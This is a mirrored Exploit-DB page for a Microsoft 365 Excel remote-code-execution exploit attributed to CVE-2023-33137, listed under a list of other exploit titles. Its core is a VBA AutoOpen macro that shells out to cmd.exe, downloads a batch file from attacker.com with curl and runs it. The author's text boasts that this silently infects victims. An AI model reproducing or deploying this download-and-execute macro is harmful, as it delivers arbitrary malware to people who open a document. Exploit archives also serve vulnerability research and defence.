bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/remote/51555.txt
Exploit-DB ef9b4e5962 DB: 2023-07-04 
20 changes to exploits/shellcodes/ghdb

TP-Link TL-WR940N V4 - Buffer OverFlow

D-Link DAP-1325 - Broken Access Control

Alkacon OpenCMS 15.0 - Multiple Cross-Site Scripting (XSS)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 64-bit - Remote Code Execution (RCE)

FuguHub 8.1 - Remote Code Execution

GZ Forum Script 1.8 - Stored Cross-Site Scripting (XSS)

PodcastGenerator 3.2.9 - Blind SSRF via XML Injection

POS Codekop v2.0 - Authenticated Remote Code Execution (RCE)

Prestashop 8.0.4 - Cross-Site Scripting (XSS)

Rukovoditel 3.4.1 - Multiple Stored XSS

Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)

spip v4.1.10 - Spoofing Admin account

Time Slot Booking Calendar 1.8 - Stored Cross-Site Scripting (XSS)

Vacation Rental 1.8 - Stored Cross-Site Scripting (XSS)

WBCE CMS 1.6.1 - Open Redirect & CSRF
WebsiteBaker v2.13.3 - Directory Traversal
WebsiteBaker v2.13.3 - Stored XSS

WP AutoComplete 1.0.4 - Unauthenticated SQLi
2023-07-04 00:16:26 +00:00

40 lines
No EOL
1.4 KiB
Text
Raw Permalink Blame History

## Title:Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074) 32-bit - Remote Code Execution (RCE)
## Author: nu11secur1ty
## Date: 06.27.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
## Reference: https://portswigger.net/daily-swig/rce
## CVE-2023-33137
## Description:
This exploit is connected with third part exploit server, which waits
for the victim to call him and execute the content from him using the
pipe posting method! This is absolutely a 0-day exploit! This is
absolutely dangerous for the victims, who are infected by him!
When the victim hit the button in the Excel file, it makes a POST
request to the exploit server, and the server is responding back that
way: He creates another hidden malicious file and executed it directly
on the machine of the victim, then everything is disappeared, so
nasty.
STATUS: HIGH Vulnerability WARNING: THIS IS VERY DANGER for the usual users!
[+]Exploit:
```vbs
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s
https://attacker.com/nu11secur1ty/somwhere/ontheinternet/maloumnici.bat
> maloumnici.bat && .\maloumnici.bat", vbNormalFocus)
End Sub
```
## Reproduce:
[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33137)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/06/microsoft-excel-microsoft-365-mso.html)
## Time spend:
01:27:00
Reference in a new issue View git blame Copy permalink